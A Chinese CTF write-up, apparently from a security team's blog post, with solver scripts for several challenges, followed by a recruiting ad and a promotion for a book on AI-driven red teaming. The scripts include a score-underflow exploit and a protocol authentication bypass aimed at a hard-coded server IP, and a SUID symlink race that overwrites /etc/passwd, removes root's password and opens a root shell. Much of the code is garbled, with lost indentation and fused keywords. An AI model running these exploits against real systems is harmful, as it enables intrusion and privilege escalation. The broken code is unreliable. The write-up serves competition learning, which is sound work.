IDA_7ffc3254f000 = [0xf6, 0x33, 0xfe, 0x9e, 0xa2, 0xf2, 0x33, 0xee, 0x9e, 0xaa, 0xf2, 0x33, 0xf6, 0x9e, 0xb2, 0xf2, 0x3b, 0x56, 0xb2, 0xbb, 0xba, 0xba, 0x7c, 0xfe, 0x9e, 0x8a, 0x1f, 0x7c, 0xfe, 0x9e, 0x8b, 0x1c, 0x7c, 0xfe, 0x9e, 0x88, 0x1d, 0x7c, 0xfe, 0x9e, 0x89, 0x12, 0x7c, 0xfe, 0x9e, 0x8e, 0x13, 0x7c, 0xfe, 0x9e, 0x8f, 0x10, 0x7c, 0xfe, 0x9e, 0x8c, 0x11, 0x7c, 0xfe, 0x9e, 0x8d, 0x16, 0x7c, 0xfe, 0x9e, 0x82, 0x17, 0x7c, 0xfe, 0x9e, 0x83, 0x14, 0x7c, 0xfe, 0x9e, 0x80, 0x15, 0x7c, 0xfe, 0x9e, 0x81, 0xa, 0x7c, 0xfe, 0x9e, 0x86, 0xb, 0x7c, 0xfe, 0x9e, 0x87, 0x8, 0x7c, 0xfe, 0x9e, 0x84, 0x9, 0x7c, 0xfe, 0x9e, 0x85, 0xe, 0x7c, 0xfe, 0x9e, 0xfa, 0xf, 0x7c, 0xfe, 0x9e, 0xfb, 0xc, 0x7c, 0xfe, 0x9e, 0xf8, 0xd, 0x7c, 0xfe, 0x9e, 0xf9, 0x2, 0x7c, 0xfe, 0x9e, 0xfe, 0x3, 0x7c, 0xfe, 0x9e, 0xff, 0x0, 0x7c, 0xfe, 0x9e, 0xfc, 0x1, 0x7c, 0xfe, 0x9e, 0xfd, 0x6, 0x7c, 0xfe, 0x9e, 0xf2, 0x7, 0x7c, 0xfe, 0x9e, 0xf3, 0x4, 0x7c, 0xfe, 0x9e, 0xf0, 0x3f, 0x7c, 0xfe, 0x9e, 0xf1, 0x3c, 0x7c, 0xfe, 0x9e, 0xf6, 0x3d, 0x7c, 0xfe, 0x9e, 0xf7, 0x32, 0x7c, 0xfe, 0x9e, 0xf4, 0x33, 0x7c, 0xfe, 0x9e, 0xf5, 0x30, 0x7c, 0xfe, 0x9e, 0xea, 0x31, 0x7c, 0xfe, 0x9e, 0xeb, 0x36, 0x7c, 0xfe, 0x9e, 0xe8, 0x37, 0x7c, 0xfe, 0x9e, 0xe9, 0x34, 0x7c, 0xfe, 0x9e, 0xee, 0x35, 0x7c, 0xfe, 0x9e, 0xef, 0x2a, 0x7c, 0xfe, 0x9e, 0xec, 0x2b, 0x7c, 0xfe, 0x9e, 0xed, 0x28, 0x7c, 0xfe, 0x9e, 0xe2, 0x29, 0x7c, 0xfe, 0x9e, 0xe3, 0x2e, 0x7c, 0xfe, 0x9e, 0xe0, 0x2f, 0x7c, 0xfe, 0x9e, 0xe1, 0x2c, 0x7c, 0xfe, 0x9e, 0xe6, 0x2d, 0x7c, 0xfe, 0x9e, 0xe7, 0x22, 0x7c, 0xfe, 0x9e, 0xe4, 0x23, 0x7c, 0xfe, 0x9e, 0xe5, 0x20, 0x7c, 0xfe, 0x9e, 0xda, 0x21, 0x7c, 0xfe, 0x9e, 0xdb, 0x26, 0x7c, 0xfe, 0x9e, 0xd8, 0x27, 0x7c, 0xfe, 0x9e, 0xd9, 0x24, 0x7c, 0xfe, 0x9e, 0xde, 0x7c, 0x7c, 0xfe, 0x9e, 0xdf, 0x7d, 0x7c, 0xfe, 0x9e, 0xdc, 0x72, 0x7c, 0xfe, 0x9e, 0xdd, 0x73, 0x7c, 0xfe, 0x9e, 0xd2, 0x70, 0x7c, 0xfe, 0x9e, 0xd3, 0x71, 0x7c, 0xfe, 0x9e, 0xd0, 0x76, 0x7c, 0xfe, 0x9e, 0xd1, 0x77, 0x7c, 0xfe, 0x9e, 0xd6, 0x74, 0x7c, 0xfe, 0x9e, 0xd7, 0x75, 0x7c, 0xfe, 0x9e, 0xd4, 0x6e, 0x7c, 0xfe, 0x9e, 0xd5, 0x6a, 0x7d, 0xfe, 0x9e, 0xaa, 0xba, 0xba, 0xba, 0xba, 0x51, 0xb0, 0x31, 0xfe, 0x9e, 0xaa, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xaa, 0x39, 0xc6, 0x9e, 0xaa, 0xfa, 0xc7, 0xa7, 0xf2, 0xd9, 0xfe, 0x9e, 0xaa, 0xb5, 0x4, 0xfe, 0xbe, 0x8a, 0x8f, 0x45, 0xba, 0xba, 0xba, 0xf2, 0xd9, 0xf6, 0x9e, 0xaa, 0x32, 0x3e, 0xb6, 0xa, 0xba, 0xba, 0xba, 0x51, 0x68, 0x7d, 0xfe, 0x9e, 0xbe, 0xba, 0xba, 0xba, 0xba, 0x7d, 0xfe, 0x9e, 0xae, 0x92, 0xba, 0xba, 0xba, 0x7d, 0xbe, 0x9e, 0xba, 0xba, 0xba, 0xba, 0x51, 0xb3, 0x31, 0xbe, 0x9e, 0x39, 0x7a, 0xb9, 0x33, 0xbe, 0x9e, 0x31, 0xfe, 0x9e, 0xae, 0x83, 0xbe, 0x9e, 0xb5, 0x37, 0x6b, 0xbb, 0xba, 0xba, 0xf2, 0xd9, 0xbe, 0x9e, 0xf2, 0x31, 0x36, 0x9e, 0xaa, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xbe, 0xbb, 0x32, 0xfe, 0x9e, 0xb7, 0x31, 0xbe, 0x9e, 0x45, 0x7a, 0x81, 0xfe, 0x9e, 0xae, 0xc7, 0xa3, 0x31, 0xbe, 0x9e, 0x45, 0x7a, 0xf2, 0x22, 0xf2, 0x31, 0x36, 0x9e, 0xaa, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xbe, 0xbb, 0x33, 0xfe, 0x9e, 0xa6, 0x51, 0xb2, 0x7d, 0xfe, 0x9e, 0xa6, 0xba, 0xba, 0xba, 0xba, 0xb5, 0xc, 0xfe, 0x9e, 0xa6, 0x32, 0xfe, 0x9e, 0xb4, 0x31, 0xbe, 0x9e, 0x39, 0x7a, 0xb8, 0x81, 0xfe, 0x9e, 0xae, 0xc7, 0xa0, 0x31, 0xbe, 0x9e, 0x39, 0x7a, 0xb8, 0xf2, 0x22, 0xf2, 0x31, 0x36, 0x9e, 0xaa, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xbe, 0xbb, 0x33, 0xfe, 0x9e, 0x9a, 0x51, 0xb2, 0x7d, 0xfe, 0x9e, 0x9a, 0xba, 0xba, 0xba, 0xba, 0xb5, 0xc, 0xfe, 0x9e, 0x9a, 0x32, 0xfe, 0x9e, 0xb5, 0xb5, 0xc, 0xfe, 0x9e, 0xb7, 0x7b, 0x42, 0xb8, 0x39, 0x5a, 0x85, 0x32, 0xfe, 0x9e, 0xb3, 0xb5, 0xc, 0xfe, 0x9e, 0xb7, 0x39, 0x5a, 0xb9, 0x7b, 0x5a, 0xbe, 0xb5, 0xc, 0xf6, 0x9e, 0xb4, 0x7b, 0x43, 0xbe, 0x39, 0x5b, 0xb5, 0xb1, 0x7b, 0x32, 0xfe, 0x9e, 0xb0, 0xb5, 0xc, 0xfe, 0x9e, 0xb4, 0x39, 0x5a, 0xb5, 0x7b, 0x5a, 0xb8, 0xb5, 0xc, 0xf6, 0x9e, 0xb5, 0x7b, 0x43, 0xbc, 0x39, 0x5b, 0xb9, 0xb1, 0x7b, 0x32, 0xfe, 0x9e, 0xb1, 0xb5, 0xc, 0xfe, 0x9e, 0xb5, 0x39, 0x5a, 0x85, 0x32, 0xfe, 0x9e, 0xb6, 0xb5, 0xc, 0xfe, 0x9e, 0xb3, 0x32, 0xfe, 0x9e, 0xb2, 0xb5, 0xc, 0xfe, 0x9e, 0xb0, 0x32, 0xfe, 0x9e, 0xb3, 0xb5, 0xc, 0xfe, 0x9e, 0xb2, 0x32, 0xfe, 0x9e, 0xb0, 0xb5, 0xc, 0xfe, 0x9e, 0xb1, 0x32, 0xfe, 0x9e, 0xb2, 0xb5, 0xc, 0xfe, 0x9e, 0xb6, 0x32, 0xfe, 0x9e, 0xb1, 0xb5, 0xc, 0xfe, 0x9e, 0xb2, 0x32, 0xfe, 0x9e, 0xb6, 0xb5, 0xc, 0xfe, 0x9e, 0xb3, 0xf2, 0xd9, 0xf6, 0x9e, 0xbe, 0xb5, 0xc, 0x3e, 0xbe, 0xa, 0xba, 0xba, 0xba, 0x32, 0xfe, 0xb6, 0xca, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0xb5, 0xc, 0xfe, 0x9e, 0xb0, 0xf2, 0xd9, 0xf6, 0x9e, 0xbe, 0xb5, 0xc, 0x3e, 0xbe, 0xa, 0xba, 0xba, 0xba, 0x32, 0xfe, 0xb6, 0xca, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0x31, 0xbe, 0x9e, 0x45, 0x7a, 0x81, 0xfe, 0x9e, 0xae, 0xc7, 0x98, 0xb5, 0xc, 0xfe, 0x9e, 0xb1, 0xf2, 0xd9, 0xf6, 0x9e, 0xbe, 0xb5, 0xc, 0x3e, 0xbe, 0xa, 0xba, 0xba, 0xba, 0x32, 0xfe, 0xb6, 0xca, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0x51, 0xae, 0xf2, 0xd9, 0xfe, 0x9e, 0xbe, 0x7c, 0xfe, 0xbe, 0xca, 0x87, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0x31, 0xbe, 0x9e, 0x39, 0x7a, 0xb8, 0x81, 0xfe, 0x9e, 0xae, 0xc7, 0x98, 0xb5, 0xc, 0xfe, 0x9e, 0xb6, 0xf2, 0xd9, 0xf6, 0x9e, 0xbe, 0xb5, 0xc, 0x3e, 0xbe, 0xa, 0xba, 0xba, 0xba, 0x32, 0xfe, 0xb6, 0xca, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0x51, 0xae, 0xf2, 0xd9, 0xfe, 0x9e, 0xbe, 0x7c, 0xfe, 0xbe, 0xca, 0x87, 0x31, 0xfe, 0x9e, 0xbe, 0x45, 0x7a, 0x33, 0xfe, 0x9e, 0xbe, 0x53, 0xa3, 0x44, 0x45, 0x45, 0x7d, 0xbe, 0x9e, 0xba, 0xba, 0xba, 0xba, 0x51, 0xb2, 0x31, 0xbe, 0x9e, 0x45, 0x7a, 0x33, 0xbe, 0x9e, 0x31, 0xfe, 0x9e, 0xbe, 0x83, 0xbe, 0x9e, 0xc7, 0xa0, 0xf2, 0xd9, 0xbe, 0x9e, 0xf2, 0xd9, 0xb6, 0x9e, 0xf2, 0x31, 0x2e, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xfe, 0xbe, 0xca, 0x32, 0xbe, 0xb0, 0x51, 0x6f, 0x7d, 0xfe, 0x9e, 0xa2, 0xae, 0xff, 0xab, 0xba, 0x7d, 0xbe, 0x9e, 0xba, 0xba, 0xba, 0xba, 0x51, 0xb2, 0x31, 0xbe, 0x9e, 0x45, 0x7a, 0x33, 0xbe, 0x9e, 0x31, 0xfe, 0x9e, 0xbe, 0x83, 0xbe, 0x9e, 0xb5, 0x37, 0x29, 0xba, 0xba, 0xba, 0x31, 0xbe, 0x9e, 0x7b, 0x5a, 0xb9, 0x23, 0x3, 0xa2, 0xba, 0xba, 0xba, 0x4d, 0x43, 0x31, 0x78, 0xb5, 0xc, 0x72, 0x31, 0xfe, 0x9e, 0xa2, 0x69, 0x52, 0x9f, 0x45, 0xba, 0xba, 0xba, 0xf2, 0xd9, 0xb6, 0x9e, 0xf2, 0x31, 0x2e, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xb6, 0xb0, 0x89, 0x72, 0x31, 0x7b, 0xf2, 0xd9, 0xb6, 0x9e, 0xf2, 0x31, 0x2e, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0x32, 0xbe, 0xb0, 0xf2, 0xd9, 0xbe, 0x9e, 0xf2, 0x31, 0x36, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xbe, 0xbb, 0x7b, 0x5a, 0xb8, 0xf2, 0xd9, 0xb6, 0x9e, 0xf2, 0x31, 0x2e, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0xb5, 0xc, 0xb6, 0xb0, 0x7b, 0x43, 0xbc, 0xb1, 0x7b, 0x8f, 0x0, 0xba, 0xba, 0xba, 0xf2, 0xd9, 0xb6, 0x9e, 0xf2, 0x31, 0x2e, 0x9e, 0xa2, 0xbb, 0xba, 0xba, 0x32, 0xbe, 0xb0, 0xd3, 0xfe, 0x9e, 0xa2, 0x29, 0xbb, 0xbb, 0xbb, 0xbf, 0xc2, 0xec, 0x8e, 0xa8, 0x33, 0xfe, 0x9e, 0xa2, 0x53, 0xe2, 0x45, 0x45, 0x45, 0xf2, 0x31, 0x3e, 0x9e, 0x9a, 0xbb, 0xba, 0xba, 0x31, 0xf6, 0x9e, 0xbe, 0x33, 0xb2, 0xf2, 0x3b, 0x7e, 0xb2, 0xbb, 0xba, 0xba, 0x79]
defdecrypt_blob():
    dec = []
for i in range(0x491):
        dec.append(IDA_7ffc3254f000[i] ^ 0xba)
return dec
with open("dec.bin", "wb") as f:
    f.write(bytes(decrypt_blob()))

鸡爪流高手

请求格式：

"GAME" | u32be(total_len) | u8(cmd) | payload

响应格式：

"GAME" | u32be(total_len) | u8(status) | utf8_text

命令：

1：如果自己是榜一，返回 flag
2：查看自己分数和排名
3：查看排行榜附近
4：重置挑战状态
5：随机匹配对手
6：查看棋盘
7：下棋，payload 是 %d,%d
8：认输

player 初始化时，自己为 50 分，其余为 50 40 30 20 20 10 2000000

在给自己的分数调用函数 score_apply_buggy_update 中存在下溢漏洞，让自己分数变成负的就够拿第一了：

思路：

开局 reset 后是 50 分，赢 10 分对手，自己 50 -> 53，对手 10 -> 7 ，输 20 分对手，自己 53 -> 37，再输另一个 20 分对手，自己 37 -> 23 ，输 30 分对手，自己 23 -> 15 ，输已经变成 38 分的对手，自己 15 -> 10 ，最后输给已经变成 7 分的对手，delta = -11，自己 10 + (-11) 下溢成 4294967295 ，之后直接读指令即可。

没抽到想要的分数可以直接认输重抽。

赢法：找个边连下 4 个即可。

eg： (10,14) (11,14) (12,14) (13,14) (14,14)

输法：随便下，不用管。

eg： (14,14) (12,14) (10,14) (8,14) (6,14)

#!/usr/bin/env python3
import argparse
import re
import socket
import struct
MAGIC = b"GAME"
WIN = [(10, 14), (11, 14), (12, 14), (13, 14), (14, 14)]
LOSE = [(14, 14), (12, 14), (10, 14), (8, 14), (6, 14)]
PLAN = [
    (10, "Win", WIN),
    (20, "Lose", LOSE),
    (20, "Lose", LOSE),
    (30, "Lose", LOSE),
    (38, "Lose", LOSE),
    (7, "Lose", LOSE),
]
MATCH_RE = re.compile(r"^Matched (.+) Score=(\d+) You=Black$")
defpkt(cmd: int, payload: bytes = b"") -> bytes:
return MAGIC + struct.pack(">I", 9 + len(payload)) + bytes([cmd]) + payload
defrecv_exact(sock: socket.socket, n: int) -> bytes:
    out = b""
while len(out) < n:
        chunk = sock.recv(n - len(out))
ifnot chunk:
raise EOFError("connection closed")
        out += chunk
return out
defreq(sock: socket.socket, cmd: int, payload: bytes = b"", verbose: bool = False) -> str:
    sock.sendall(pkt(cmd, payload))
    head = recv_exact(sock, 9)
if head[:4] != MAGIC:
raise RuntimeError(f"bad magic: {head[:4]!r}")
    size = struct.unpack(">I", head[4:8])[0] - 9
    body = recv_exact(sock, size).decode("utf-8", errors="replace")
if verbose:
        print(f"[{cmd}] {body}")
return body
defpick_score(sock: socket.socket, target: int, verbose: bool) -> tuple[str, int]:
whileTrue:
        text = req(sock, 5, verbose=verbose)
        m = MATCH_RE.match(text)
ifnot m:
raise RuntimeError(f"bad match reply: {text!r}")
        name, score = m.group(1), int(m.group(2))
        print(f"match {name} score={score}")
if score == target:
return name, score
        text = req(sock, 8, verbose=verbose)
ifnot text.startswith("Draw Delta=0 "):
raise RuntimeError(f"redraw failed: {text!r}")
defplay(sock: socket.socket, moves: list[tuple[int, int]], expect: str, verbose: bool) -> str:
    last = ""
for x, y in moves:
        last = req(sock, 7, f"{x},{y}".encode(), verbose=verbose)
ifnot last.startswith("Continue "):
break
ifnot last.startswith(expect + " "):
raise RuntimeError(f"expected {expect}, got {last!r}")
return last
defmain() -> None:
    ap = argparse.ArgumentParser(description="Exploit")
    ap.add_argument("--host", default="114.66.24.221")
    ap.add_argument("--port", type=int, default=33589)
    ap.add_argument("--verbose", action="store_true")
    args = ap.parse_args()
    sock = socket.create_connection((args.host, args.port))
try:
        print(req(sock, 4, verbose=args.verbose))
        print(req(sock, 2, verbose=args.verbose))
for target, outcome, moves in PLAN:
            name, _ = pick_score(sock, target, args.verbose)
            print(f"target={target} opponent={name} outcome={outcome}")
            print(play(sock, moves, outcome, args.verbose))
            print(req(sock, 2, verbose=args.verbose))
        print(req(sock, 1, verbose=args.verbose))
finally:
        sock.close()
if __name__ == "__main__":
    main()

Misc:

Merlin

NCTF{88478dd1-ec24-4f2b-a4a5-a25e85b5c868}

What a mess!

import csv
import re
import unicodedata
from decimal import Decimal, InvalidOperation
ZW_RE = re.compile(r"[\u200b\u200c\u200d\ufeff]")
ALLOWED_PREFIXES = {
"135",
"136",
"137",
"138",
"139",
"150",
"151",
"152",
"158",
"159",
"186",
"188",
}
ID_WEIGHTS = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
ID_CHECK_MAP = "10X98765432"
defnormalize_text(value: str) -> str:
return ZW_RE.sub("", unicodedata.normalize("NFKC", value or"")).strip()
defnormalize_phone(value: str) -> str:
    digits = "".join(ch for ch in normalize_text(value) if ch.isdigit())
if len(digits) == 13and digits.startswith("86"):
        digits = digits[2:]
return digits
defis_valid_phone(phone: str) -> bool:
return len(phone) == 11and phone[:3] in ALLOWED_PREFIXES
defnormalize_id_card(value: str) -> str:
return normalize_text(value).replace(" ", "").upper()
defis_valid_id_card(id_card: str) -> bool:
if len(id_card) != 18:
returnFalse
ifnot id_card[:17].isdigit():
returnFalse
if id_card[-1] notin"0123456789X":
returnFalse
    total = sum(int(ch) * weight for ch, weight in zip(id_card[:17], ID_WEIGHTS))
return ID_CHECK_MAP[total % 11] == id_card[-1]
defnormalize_balance(value: str):
    cleaned = normalize_text(value)
for token in ("CNY", "¥", ","):
        cleaned = cleaned.replace(token, "")
try:
return Decimal(cleaned)
except InvalidOperation:
returnNone
defis_li_surname(name: str) -> bool:
return name.startswith("李") or bool(re.match(r"(?i)^li(?=[^a-z]|$)", name))
defmain():
    deduped = []
    seen = set()
with open("customer_dump.csv", "r", encoding="utf-8-sig", newline="") as f:
        reader = csv.DictReader(f)
for row in reader:
            record = (
                normalize_text(row["Name"]),
                normalize_id_card(row["ID_Card"]),
                normalize_phone(row["Phone"]),
                normalize_balance(row["Balance"]),
            )
if record in seen:
continue
            seen.add(record)
            deduped.append(record)
    q1 = 0
    q2 = 0
    q3 = 0
    q4 = Decimal("0")
    q5 = 0
for name, id_card, phone, balance in deduped:
        phone_ok = is_valid_phone(phone)
        id_ok = is_valid_id_card(id_card)
if phone_ok:
            q1 += 1
if id_ok:
            q2 += 1
ifnot (phone_ok and id_ok):
continue
        q3 += 1
if balance isnotNoneand balance >= 0:
            q4 += balance
if is_li_surname(name):
            q5 += 1
    print(q1)
    print(q2)
    print(q3)
    print(f"{q4:.2f}")
    print(q5)
if __name__ == "__main__":
    main()

ezProtocol

协议文件给出关键常量：
Magic = 0x47414D45，即 GAME
TypeAuth = 0x01
TypeQuery = 0x02
TypeGetFlag = 0x03
HeaderSize = 10
Key = []byte{0x4e, 0x43, 0x54, 0x46}，即 NCTF
抓包中应用层数据都以 GAME 开头，说明协议结构就是：
4 bytes magic
1 byte type
1 byte payload_len
4 bytes checksum
payload
还原后确认：
负载是 JSON
负载加密方式是按字节异或：payload[i] ^ "NCTF"[i%4]
校验方式是：crc32(header(校验字段置0) + encrypted_payload)，大端

抓包还原的关键明文

{"username":"ctfer","password":"NCTF2026"}

利用思路

先发送 TypeAuth(0x01)，使用抓包恢复出的合法账号：

{"username":"ctfer","password":"NCTF2026"}

服务端返回：

{"message":"Authenticated","status":"ok"}

保持同一 TCP 连接，发送 TypeGetFlag(0x03)：

{"username":"admin","password":"x"}

服务端只检查当前连接已登录，同时错误地信任请求体中的 username=admin
返回 flag

#python solve_ezProtocol.py 114.66.24.221 48082 --mode auth
import argparse
import json
import socket
import struct
import zlib
MAGIC = b"GAME"
KEY = b"NCTF"
TYPE_AUTH = 0x01
TYPE_QUERY = 0x02
TYPE_GETFLAG = 0x03
defxor_payload(data: bytes) -> bytes:
return bytes(data[i] ^ KEY[i % len(KEY)] for i in range(len(data)))
defbuild_packet(msg_type: int, payload_obj: dict) -> bytes:
    payload = json.dumps(payload_obj, separators=(",", ":")).encode()
    enc_payload = xor_payload(payload)
    header = bytearray(MAGIC + bytes([msg_type, len(enc_payload)]) + b"\x00\x00\x00\x00")
    checksum = zlib.crc32(header + enc_payload) & 0xFFFFFFFF
    header[6:10] = struct.pack(">I", checksum)
return bytes(header) + enc_payload
defrecv_packet(sock: socket.socket) -> tuple[int, dict]:
    header = recv_exact(sock, 10)
if header[:4] != MAGIC:
raise ValueError(f"bad magic: {header[:4]!r}")
    msg_type = header[4]
    length = header[5]
    recv_checksum = struct.unpack(">I", header[6:10])[0]
    payload = recv_exact(sock, length)
    verify_header = bytearray(header)
    verify_header[6:10] = b"\x00\x00\x00\x00"
    calc_checksum = zlib.crc32(bytes(verify_header) + payload) & 0xFFFFFFFF
if calc_checksum != recv_checksum:
raise ValueError(f"checksum mismatch: got {recv_checksum:#x}, expect {calc_checksum:#x}")
    plain = xor_payload(payload)
return msg_type, json.loads(plain.decode())
defrecv_exact(sock: socket.socket, n: int) -> bytes:
    chunks = []
    remain = n
while remain:
        chunk = sock.recv(remain)
ifnot chunk:
raise ConnectionError("connection closed before packet completed")
        chunks.append(chunk)
        remain -= len(chunk)
returnb"".join(chunks)
defexchange(sock: socket.socket, msg_type: int, payload_obj: dict) -> dict:
    sock.sendall(build_packet(msg_type, payload_obj))
    _, resp = recv_packet(sock)
return resp
defmode_direct(sock: socket.socket) -> list[dict]:
    steps = []
    steps.append(exchange(sock, TYPE_GETFLAG, {"username": "admin", "password": "x"}))
return steps
defmode_auth_then_admin(sock: socket.socket) -> list[dict]:
    steps = []
    steps.append(exchange(sock, TYPE_AUTH, {"username": "ctfer", "password": "NCTF2026"}))
    steps.append(exchange(sock, TYPE_GETFLAG, {"username": "admin", "password": "x"}))
return steps
defmode_session_confusion(sock: socket.socket) -> list[dict]:
    steps = []
    sock.sendall(
        build_packet(TYPE_AUTH, {"username": "ctfer", "password": "NCTF2026"})
        + build_packet(TYPE_AUTH, {"username": "admin", "password": "x"})
    )
    steps.append(recv_packet(sock)[1])
    steps.append(recv_packet(sock)[1])
    steps.append(exchange(sock, TYPE_GETFLAG, {"username": "admin", "password": "x"}))
return steps
defmain() -> None:
    parser = argparse.ArgumentParser(description="ezProtocol solver")
    parser.add_argument("host", help="target host")
    parser.add_argument("port", type=int, help="target port")
    parser.add_argument(
"--mode",
        choices=["direct", "auth", "confusion"],
        default="direct",
        help="direct: send getflag as admin directly; auth: auth as ctfer then getflag as admin; confusion: replay the dual-auth pattern from the pcap",
    )
    args = parser.parse_args()
with socket.create_connection((args.host, args.port), timeout=5) as sock:
if args.mode == "direct":
            responses = mode_direct(sock)
elif args.mode == "auth":
            responses = mode_auth_then_admin(sock)
else:
            responses = mode_session_confusion(sock)
for idx, resp in enumerate(responses, 1):
        print(f"[step {idx}] {json.dumps(resp, ensure_ascii=False)}")
if __name__ == "__main__":
    main()

Quantum Vault

将初始 100 USD 转换为高汇率币种，再去collect，然后去拿shell

import re
import select
import socket
import sys
import time
HOST = "114.66.24.221"
PORT = 46978
PROMPT_RE = re.compile(rb"\d+@[A-Z]+> ")
ANSI_RE = re.compile(rb"\x1b\[[0-9;]*m")
TIMEOUT_MARK = "量子链路超时".encode()
defstrip_ansi(data: bytes) -> str:
return ANSI_RE.sub(b"", data).decode("utf-8", errors="replace")
classClient:
def__init__(self, host: str, port: int):
        self.sock = socket.create_connection((host, port), timeout=5)
        self.sock.setblocking(False)
def_recv_until(self, idle: float, total: float) -> bytes:
        buf = b""
        start = time.time()
        last = start
whileTrue:
            now = time.time()
if now - start > total:
break
            timeout = min(idle, total - (now - start))
            readable, _, _ = select.select([self.sock], [], [], timeout)
ifnot readable:
if buf and time.time() - last >= idle:
break
continue
            chunk = self.sock.recv(4096)
ifnot chunk:
break
            buf += chunk
            last = time.time()
if PROMPT_RE.search(buf) or TIMEOUT_MARK in buf:
break
return buf
defrecv_until_prompt(self) -> bytes:
return self._recv_until(idle=0.2, total=8.0)
defcmd(self, line: str) -> str:
        self.sock.sendall(line.encode() + b"\n")
return strip_ansi(self.recv_until_prompt())
defrecv_some(self, wait: float) -> str:
return strip_ansi(self._recv_until(idle=wait, total=wait))
defclose(self) -> None:
try:
            self.sock.close()
except OSError:
pass
defmain(argv: list[str]) -> int:
    cli = Client(HOST, PORT)
try:
        banner = strip_ansi(cli.recv_until_prompt())
        sys.stdout.write(banner)
for cmd in argv[1:]:
            sys.stdout.write(f"$ {cmd}\n")
if cmd.startswith("WAIT "):
                wait = float(cmd.split(" ", 1)[1])
                sys.stdout.write(cli.recv_some(wait))
else:
                sys.stdout.write(cli.cmd(cmd))
finally:
        cli.close()
return0
if __name__ == "__main__":
raise SystemExit(main(sys.argv))

找能提权的东西

发现/usr/local/bin/q-vault-sync，这玩意允许将一个文件“同步”到 /tmp/ 目录下的子目录中。

mkdir -p /tmp/exploit
echo "test" > /tmp/mykey
# 终端 1: 疯狂切换文件与软链接
while true; do 
    touch /tmp/exploit/synced_key.dat; 
    rm /tmp/exploit/synced_key.dat; 
    ln -s /etc/passwd /tmp/exploit/synced_key.dat; 
    rm /tmp/exploit/synced_key.dat; 
done &
# 终端 2: 疯狂运行 SUID 程序直到成功
while true; do 
    /usr/local/bin/q-vault-sync -s /tmp/mykey -d /tmp/exploit 2>/dev/null
    ls -l /etc/passwd | grep ctfuser && break
done

然后去改密码

cp /etc/passwd /tmp/passwd.bak 
cat /etc/passwd | sed 's/^root:x:/root::/' > /tmp/passwd.new 
cat /tmp/passwd.new > /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash")'
su root

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

跳转微信打开

红队实战指南：AI驱动的渗透测试、红队评估和漏洞挖掘

Mon, 23 Mar 2026 09:54:00 +0800

ChaMd5安全团队 2026-03-23 09:54 辽宁

红队评估和安全测试的技术与理论正在与人工智能（AI）等新兴技术深度融合。网络安全领域已经不再局限于识别缓冲区溢出或SQL注入漏洞。当前，安全专业人员正致力于探索一个全新的领域：具有推理、适应和学习能力的智能系统。

传统安全工具和技术发生了重大变革。人工智能防御系统能够以毫秒级的速度实现威胁检测与响应，机器学习和生成式人工智能模型可以快速分析大量行为模式，完成原本需要分析师耗时数月才能完成的工作。这场技术革命在推动进步的同时，也带来了新的漏洞和攻击面。

《红队实战指南：AI驱动的渗透测试、红队评估和漏洞挖掘》重点介绍攻击性安全测试领域正在发生的重大变化，为读者提供必要的专业知识。随着各种组织广泛使用人工智能驱动的防护系统，传统的红队评估、渗透测试和漏洞挖掘活动需要进行相应调整。在这一新时代，红队成员必须掌握适应当前技术环境的专业技能，而漏洞赏金猎人也需要优化工具和方法，以应对具备预测和实时响应能力的智能防御系统。

希望每一位读者都能从这本书中找到属于自己的答案：如何在AI与安全的博弈中，既成为规则的挑战者，也成为规则的塑造者。这本书不仅仅是一本技术手册，它更像是一面镜子，映射出我们这个行业的现状与未来。当AI开始具备推理和学习能力时，攻击与防御的边界正在逐渐模糊。而这本书的意义就在于，它为我们提供了重新定义攻击艺术的可能性。

全书聚焦人工智能与安全测试的交叉创新，系统性地介绍了从AI辅助信息收集到漏洞利用开发等前沿技术。通过结合传统安全方法论和新兴技术，本书为读者构建了一幅完整的现代安全测试知识图谱，帮助读者在这一新兴领域开展探索之旅。

欢迎探索道德黑客的未来！

读者对象

本书适合三类读者阅读：

网络安全入门者、计划从事红队评估的网络安全从业人员，以及希望提升专业知识的漏洞挖掘研究人员。
希望在红队评估中使用人工智能技术的安全专家
正在组建或提升红队评估能力的机构团队。

学习本书需要具备的基础知识包括：网络、操作系统、网络技术的基础知识，以及网络安全的基本概念和专业术语。

上拉下滑查看目录 ↓

Contents目　　录

译者序

前言

关于作者

关于技术审校者

第1章　渗透测试、红队评估和漏洞挖掘的演进 1

1.1　深入探索 1

1.1.1　未知的领域 2

1.1.2　人工智能速成指南 2

1.1.3　突破防线 3

1.1.4　高潮 4

1.1.5　后续步骤 5

1.2　行业概述 5

1.2.1　渗透测试、红队评估和漏洞挖掘

计划简介 5

1.2.2　这些方法为什么重要 6

1.2.3　黑客的演变 6

1.3　渗透测试的早期发展与演变 6

1.4　红队评估的兴起 8

1.5　漏洞挖掘计划的兴起 8

1.6　渗透测试、红队评估和漏洞挖掘的

融合 10

1.7　渗透测试、红队评估和漏洞挖掘的

未来 10

1.8　人工智能和机器学习在渗透测试、红队评估和漏洞挖掘中的应用不断增加 11

1.9　技能测试 12

第2章　红队评估导论 14

2.1　什么是红队评估 14

2.2　红队评估的重要性 15

2.2.1　识别关键漏洞 15

2.2.2　质疑假设 15

2.2.3　模拟特定行业威胁 16

2.3　红队框架与方法论 16

